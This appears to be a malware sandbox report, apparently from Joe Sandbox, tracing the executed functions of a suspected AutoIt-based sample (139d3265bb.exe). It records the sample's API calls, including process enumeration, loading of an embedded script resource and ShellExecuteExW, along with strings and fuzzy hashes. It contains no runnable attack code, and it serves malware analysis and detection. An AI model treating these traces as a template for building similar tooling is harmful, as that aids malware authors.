Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: a088276c58bdf1af922d150cb60ce519fbc631be40a1a18834dab16dc5469bbf
Instruction ID: 41471b2d1fca544a8deed8cbb6588a53b2456815a927a23545d970283c157c86
Opcode Fuzzy Hash: a088276c58bdf1af922d150cb60ce519fbc631be40a1a18834dab16dc5469bbf
Instruction Fuzzy Hash: 4C212875A00219AFDF11EBA8DC959FEBBB8FF08750B000029F501E7361DB74AE419BA1

Analysis Process: 139d3265bb.exePID: 8148, Parent PID: 7616COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	1375
Total number of Limit Nodes:	40

Executed Functions

Function 00D542DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00D5430D

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

GetCurrentProcess.KERNEL32(?,00DECB64,00000000,?,?), ref: 00D54422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00D54429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D54454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D54466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00D54474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00D5447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00D544A0

Strings

kernel32.dll, xrefs: 00D5444F
GetNativeSystemInfo, xrefs: 00D54460
|O, xrefs: 00D936F8

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: ab2b58895554441e73960188c610eeaa78de622be22f5e9abd2e0ffe8a097e64
Instruction ID: 65fa26d31a7dfbec333d4f55964564686a33030b8b4c98edb16cf0350855f22f
Opcode Fuzzy Hash: ab2b58895554441e73960188c610eeaa78de622be22f5e9abd2e0ffe8a097e64
Instruction Fuzzy Hash: 19A1936291A3C0DFCF31CB6B7C851957FE66B76305B0A54E9D881B7A21D260474ECB32

Function 00D542A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D550AA,?,?,00000000,00000000), ref: 00D542B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D550AA,?,?,00000000,00000000), ref: 00D542C9
LoadResource.KERNEL32(?,00000000,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20), ref: 00D935BE
SizeofResource.KERNEL32(?,00000000,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20), ref: 00D935D3
LockResource.KERNEL32(00D550AA,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20,?), ref: 00D935E6

Strings

SCRIPT, xrefs: 00D542BF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: d4095d443dc466c00430a6d3e479477fb60c61d673de92cec9c1cdc6eb14b7c0
Instruction ID: 0521fb628118ff2c1ad0601c37057359c0d45999e93f24e77fa1b643c752c851
Opcode Fuzzy Hash: d4095d443dc466c00430a6d3e479477fb60c61d673de92cec9c1cdc6eb14b7c0
Instruction Fuzzy Hash: E211AC70201301BFDB219B65DC88F277BB9EBC5B56F144169B902CA250DB71D8068631

Function 00DBD4DC Relevance: 6.1, APIs: 4, Instructions: 86
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00DBD501
Process32FirstW.KERNEL32(00000000,?), ref: 00DBD50F
Process32NextW.KERNEL32(00000000,?), ref: 00DBD52F
FindCloseChangeNotification.KERNEL32(00000000), ref: 00DBD5DC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: ff9b67aa96de6c6f2c8f7d8d19c0734100fd63012a139ebacaaff5430947c11e
Instruction ID: 2272ce42b2ec7a809af902dc8394062167ca3df62afe14f71ee7bfa2ffdb5e3c
Opcode Fuzzy Hash: ff9b67aa96de6c6f2c8f7d8d19c0734100fd63012a139ebacaaff5430947c11e
Instruction Fuzzy Hash: 1F31AF71008340DFD710EF54C891AAFBBE8EF99344F54092DF982871A2EB719949CBB2

Function 00DBDBBE Relevance: 6.0, APIs: 4, Instructions: 29
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,00D95222), ref: 00DBDBCE
GetFileAttributesW.KERNEL32(?), ref: 00DBDBDD
FindFirstFileW.KERNEL32(?,?), ref: 00DBDBEE
FindClose.KERNEL32(00000000), ref: 00DBDBFA

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 1baa4367c4f330d4f170c36ffaf0c49244d4c8df83fd5bfce135cd71483bec3c
Instruction ID: add521370ba934f8851242a2742acdfdd3385695d58108b1238a6ec521d3ab99
Opcode Fuzzy Hash: 1baa4367c4f330d4f170c36ffaf0c49244d4c8df83fd5bfce135cd71483bec3c
Instruction Fuzzy Hash: E8F0A73082061097C2207B789C4E4AA3B7D9E05334B144706F976C11E0FBB05D5585B9

Function 00D74CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000,?,00D828E9), ref: 00D74D09
TerminateProcess.KERNEL32(00000000,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000,?,00D828E9), ref: 00D74D10
ExitProcess.KERNEL32 ref: 00D74D22

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7dd82f67e221404b1878c26a0f888dd7db7aaaa1d6d55b8675c18b5a19b801ef
Instruction ID: 4734078ddefad4d6491f48c06c1458c466f1ee66d9b878a8f78d2e27fafd2fd1
Opcode Fuzzy Hash: 7dd82f67e221404b1878c26a0f888dd7db7aaaa1d6d55b8675c18b5a19b801ef
Instruction Fuzzy Hash: 28E0B631010288AFCF22BF54DD5AA583B69EB41791B158014FC59DA222EB35ED52CBB0

Function 00D5D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00D5D807
timeGetTime.WINMM ref: 00D5DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB28
TranslateMessage.USER32(?), ref: 00D5DB7B
DispatchMessageW.USER32(?), ref: 00D5DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB9F
Sleep.KERNEL32(0000000A), ref: 00D5DBB1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: f8e4ee7aa7b718854afe487a5db5b45ca5cb30248d031b6d9b507a46e9211e41
Instruction ID: 96d0820e80b99fb3d7dbf17c34787495d1dbca15a68e3165cf217804087fdc7b
Opcode Fuzzy Hash: f8e4ee7aa7b718854afe487a5db5b45ca5cb30248d031b6d9b507a46e9211e41
Instruction Fuzzy Hash: 6542BE706083419FDB38DF25C884BAAB7A2FF56315F184559EC96872A1D770E848CFB2

Function 00D52CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D52D07
RegisterClassExW.USER32(00000030), ref: 00D52D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D52D42
InitCommonControlsEx.COMCTL32(?), ref: 00D52D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D52D6F
LoadIconW.USER32(000000A9), ref: 00D52D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D52D94

Strings

AutoIt v3 GUI, xrefs: 00D52D23
0, xrefs: 00D52CE9
TaskbarCreated, xrefs: 00D52D37
+, xrefs: 00D52CF0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a5525af24dba7483e02bd5c9d2a3efd381b26ad604692263adacf60a95dcaafe
Instruction ID: 20ac02da62b8f9c4bbf37f3a60f957d2afa1cd43264c75e96c33516da759ae25
Opcode Fuzzy Hash: a5525af24dba7483e02bd5c9d2a3efd381b26ad604692263adacf60a95dcaafe
Instruction Fuzzy Hash: 1021E4B1911348AFDB10EFA5E889B9DBBB4FB08700F10515AF511FA3A0D7B10646CFA1

Function 00D9065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D9039A: CreateFileW.KERNEL32(00000000,00000000,?,00D90704,?,?,00000000,?,00D90704,00000000,0000000C), ref: 00D903B7

GetLastError.KERNEL32 ref: 00D9076F
__dosmaperr.LIBCMT ref: 00D90776
GetFileType.KERNEL32(00000000), ref: 00D90782
GetLastError.KERNEL32 ref: 00D9078C
__dosmaperr.LIBCMT ref: 00D90795
CloseHandle.KERNEL32(00000000), ref: 00D907B5
CloseHandle.KERNEL32(?), ref: 00D908FF
GetLastError.KERNEL32 ref: 00D90931
__dosmaperr.LIBCMT ref: 00D90938

Strings

H, xrefs: 00D908BD

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 3d03c06b991e806b85997279e62702ab0af8892792a83a4b75fb50ed2ce1cd11
Instruction ID: 7773c06a441558f8d5c3ed7687005594be093c059b0c80e8136104c2a2d3b3d3
Opcode Fuzzy Hash: 3d03c06b991e806b85997279e62702ab0af8892792a83a4b75fb50ed2ce1cd11
Instruction Fuzzy Hash: 25A11632A141049FDF29AF68E851BAD7FA1EB06320F184159F815EB3D2D7319817CBB1

Function 00D5344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D53A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E21418,?,00D52E7F,?,?,?,00000000), ref: 00D53A78

Part of subcall function 00D53357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D53379

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D5356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D9318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D931CE
RegCloseKey.ADVAPI32(?), ref: 00D93210
_wcslen.LIBCMT ref: 00D93277
_wcslen.LIBCMT ref: 00D93286

Strings

\, xrefs: 00D9328C
Software\AutoIt v3\AutoIt, xrefs: 00D53560
\Include\, xrefs: 00D53527
Include, xrefs: 00D93184, 00D931C5

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 51f0aa04d54312304d6cfd107cd54dae7dbcffd0e22ff0f9e7839d95c235a5b6
Instruction ID: ead3a558c654f5e30b565be1dbcf6671896bd4dd2e9dfbca57e2d9c2886bf8ea
Opcode Fuzzy Hash: 51f0aa04d54312304d6cfd107cd54dae7dbcffd0e22ff0f9e7839d95c235a5b6
Instruction Fuzzy Hash: 7E717271404302AEC724EF6AEC8196BBBE8FF95350F40452DFA45A7161EB309A4DCB72

Function 00D52B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D52B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00D52B9D
LoadIconW.USER32(00000063), ref: 00D52BB3
LoadIconW.USER32(000000A4), ref: 00D52BC5
LoadIconW.USER32(000000A2), ref: 00D52BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D52BEF
RegisterClassExW.USER32(?), ref: 00D52C40

Part of subcall function 00D52CD4: GetSysColorBrush.USER32(0000000F), ref: 00D52D07
Part of subcall function 00D52CD4: RegisterClassExW.USER32(00000030), ref: 00D52D31
Part of subcall function 00D52CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D52D42
Part of subcall function 00D52CD4: InitCommonControlsEx.COMCTL32(?), ref: 00D52D5F
Part of subcall function 00D52CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D52D6F
Part of subcall function 00D52CD4: LoadIconW.USER32(000000A9), ref: 00D52D85
Part of subcall function 00D52CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D52D94

Strings

AutoIt v3, xrefs: 00D52C2F
0, xrefs: 00D52C0F
#, xrefs: 00D52C16

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 9f1d7efc1754b5e93e450e4353c3bed4494fec73efddcab52da0b0e4057172a1
Instruction ID: b579bec9cdfafe486d9c0681b3ad64d11bb1c15c1d5450a69253391720967541
Opcode Fuzzy Hash: 9f1d7efc1754b5e93e450e4353c3bed4494fec73efddcab52da0b0e4057172a1
Instruction Fuzzy Hash: 11213070D10354AFDB21EF96EC85B997FB5FB18B50F1100AAE500B67A0D3B1064ACF90

Function 00D53170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D5316A,?,?), ref: 00D531D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00D5316A,?,?), ref: 00D53204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D53227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D5316A,?,?), ref: 00D53232
CreatePopupMenu.USER32 ref: 00D53246
PostQuitMessage.USER32(00000000), ref: 00D53267

Strings

TaskbarCreated, xrefs: 00D5322D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: ad2d19a5631864408f051e0614d24182b6a61cbc6eb3aca619f08027682e9234
Instruction ID: 681e2b863e3056e538c3138be204fa7b750b6058b14595c4f0b6e669864e1c02
Opcode Fuzzy Hash: ad2d19a5631864408f051e0614d24182b6a61cbc6eb3aca619f08027682e9234
Instruction Fuzzy Hash: 1F417630210704BBDF246B789C4AB793A19FB553C2F080125FD42EA2A1CB70CB4E87B5

Function 00D51410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D51459
OleUninitialize.OLE32(?,00000000), ref: 00D514F8
UnregisterHotKey.USER32(?), ref: 00D516DD
DestroyWindow.USER32(?), ref: 00D924B9
FreeLibrary.KERNEL32(?), ref: 00D9251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D9254B

Strings

close all, xrefs: 00D51454

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 45a4cad9425a938f70a171feddfd76f133a0c72938e6f65f075b907137d8be2c
Instruction ID: a81d00fdd1493b127bfca5ddf951257a96b469c464144a9fe811c98ef1b0071c
Opcode Fuzzy Hash: 45a4cad9425a938f70a171feddfd76f133a0c72938e6f65f075b907137d8be2c
Instruction Fuzzy Hash: C1D136356012129FCF29EF15C899B29F7A4FF05701F1542ADE84AAB252DB31AD1ACF70

Function 00D52C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D52C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D52CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00D51CAD,?), ref: 00D52CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00D51CAD,?), ref: 00D52CCF

Strings

AutoIt v3, xrefs: 00D52C89, 00D52C8E, 00D52C8F
edit, xrefs: 00D52CAC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 37e91d962efa24f849b9f6634282c967a0fddfdc58740c8f6a4cf7cbdcaaf0af
Instruction ID: d798daa82f4d8aad47fe2899cae02927c3b89fce4bb0e5025c0df55ee2c2e2d7
Opcode Fuzzy Hash: 37e91d962efa24f849b9f6634282c967a0fddfdc58740c8f6a4cf7cbdcaaf0af
Instruction Fuzzy Hash: 64F030755503D87EE73067136C48F7B2E7ED7DAF50B0210A9F900A6260C2710846DE70

Function 00DDAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00DDAEA3

Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625

GetProcessId.KERNEL32(00000000), ref: 00DDAF38
CloseHandle.KERNEL32(00000000), ref: 00DDAF67

Strings

@, xrefs: 00DDAE72
<, xrefs: 00DDAE6B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 7ee1ebe3578a9fc28133a2fed3c5965897f41596d7db23cbf58aaa2413f7cfa8
